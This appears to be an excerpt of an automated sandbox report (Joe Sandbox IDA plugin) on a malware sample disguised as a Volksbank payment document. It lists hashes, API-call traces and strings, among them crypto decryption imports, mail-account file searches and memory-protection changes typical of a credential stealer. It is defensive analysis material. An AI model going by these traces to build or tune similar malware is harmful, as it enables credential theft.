• Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
• Opcode Fuzzy Hash: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
• Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
APIs
• GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
• GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
• Part of subcall function 0044B40E: GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
• Part of subcall function 0044B40E: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
• Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
• Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2099061454-0
                                                                                                                                                                                                                                          • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                                                          • Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                                                                                                                                                                          • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                                                                                                                                                          • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2152742572-0
                                                                                                                                                                                                                                          • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                                                          • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,0040CF6F,76940A60,?,00000000), ref: 00410D1C
                                                                                                                                                                                                                                            • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00410E10
                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                                                                                                                                                            • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                                                                                                                                                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                                                                          • API String ID: 889583718-2036018995
                                                                                                                                                                                                                                          • Opcode ID: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
                                                                                                                                                                                                                                          • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                                                                                                                                                                                                                          • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                                                                                                                                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                                                                                                                                                                                                                          • LockResource.KERNEL32(00000000), ref: 00410CA1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3473537107-0
                                                                                                                                                                                                                                          • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                                                                                                                                                                          • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 004109F7
                                                                                                                                                                                                                                            • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                                                                                                                                                                                            • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                                                                                                                                                                                                          • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00410A32
                                                                                                                                                                                                                                          • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3143880245-0
                                                                                                                                                                                                                                          • Opcode ID: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
                                                                                                                                                                                                                                          • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: ??3@
• String ID:
• API String ID: 613200358-0
• Opcode ID: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
• Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
• Opcode Fuzzy Hash: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
• Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
APIs
• ??2@YAPAXI@Z.MSVCRT(00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,76940A60), ref: 00408D5C
• ??2@YAPAXI@Z.MSVCRT(00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,76940A60), ref: 00408D7A
• ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,76940A60), ref: 00408D98
• ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,76940A60), ref: 00408DA8
Similarity
• API ID: ??2@
• String ID:
• API String ID: 1033339047-0
• Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
• Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
• Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
• Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
APIs
• malloc.MSVCRT ref: 00406F4C
• memcpy.MSVCRT(00000000,00000000,00000000,00000000,76940A60,00407A43,00000001,?,00000000,76940A60,00407DBD,00000000,?,?), ref: 00406F64
• free.MSVCRT ref: 00406F6D
Similarity
• API ID: freemallocmemcpy
• String ID:
• API String ID: 3056473165-0
• Opcode ID: f6360f64df0fef16feaa284e534344f6101794aca07d62af19e0e66fd0e0db42
• Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
• Opcode Fuzzy Hash: f6360f64df0fef16feaa284e534344f6101794aca07d62af19e0e66fd0e0db42
• Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
APIs
  • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
  • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
• CreateFontIndirectA.GDI32(?), ref: 004070A6
Strings
Similarity
• API ID: CreateFontIndirect_mbscpymemset
• String ID: Arial
• API String ID: 3853255127-493054409
• Opcode ID: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
• Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
• Opcode Fuzzy Hash: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
• Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99
APIs
  • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
• _strcmpi.MSVCRT ref: 0040CEC3
Strings
Similarity
• API ID: strlen$_strcmpimemset
• String ID: /stext
• API String ID: 520177685-3817206916
• Opcode ID: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
• Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
• Opcode Fuzzy Hash: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
• Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
APIs
  • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?), ref: 0040479A
• LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
• GetProcAddress.KERNEL32(00000000,?), ref: 00404754
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID:
• API String ID: 145871493-0
• Opcode ID: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
• Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
• Opcode Fuzzy Hash: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
• Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
APIs
• GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
  • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
  • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
  • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4165544737-0
                                                                                                                                                                                                                                          • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                                                                                                                                                          • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                                                                                          • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                                                                                                                                                          • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,0040B01C,00000000,00000000,00000000,0044C52F,0044C52F,?,0040CF35,0044C52F), ref: 00406D2C
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                                                                                          • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                                                                                                                                                          • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                                                                                          • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                                                                                                                                                          • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • EnumResourceNamesA.KERNEL32(?,?,00410C68,00000000), ref: 00410D02
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: EnumNamesResource
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3334572018-0
                                                                                                                                                                                                                                          • Opcode ID: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                                                                                                                                                                                                          • Instruction ID: 5afcab74deb5f1f746bbc86617496166ce7982b7e139a3a4a0d32d3f52cd2e16
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 05C09B3119534197C7519F108C4DF1B7695BB59706F144D297191940A4D7514054DE05
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CloseFind
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1863332320-0
                                                                                                                                                                                                                                          • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                                                                                                                                                          • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: Open
• String ID:
• API String ID: 71445658-0
• Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
• Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
• Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
• Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
APIs
• GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
• Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
• Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
• Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
APIs
• LoadLibraryA.KERNEL32(advapi32.dll,?,00404A4C,?,?,0040412F,?,?,004041E4), ref: 004047DA
• GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
• GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
• GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
• GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
• GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
• GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
• GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
• GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
• GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
• GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
Strings
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: AddressProc$LibraryLoad
• String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
• API String ID: 2238633743-192783356
• Opcode ID: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
• Instruction ID: 70faa285c49fb169990c8fbe2f493e995bb0ef80ad344915aa685f594b7479e2
• Opcode Fuzzy Hash: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
• Instruction Fuzzy Hash: 1101C978E40744AEDB316F76CC09E06BEE1EF9C7047214D2EE1C153650D77AA011DE48
APIs
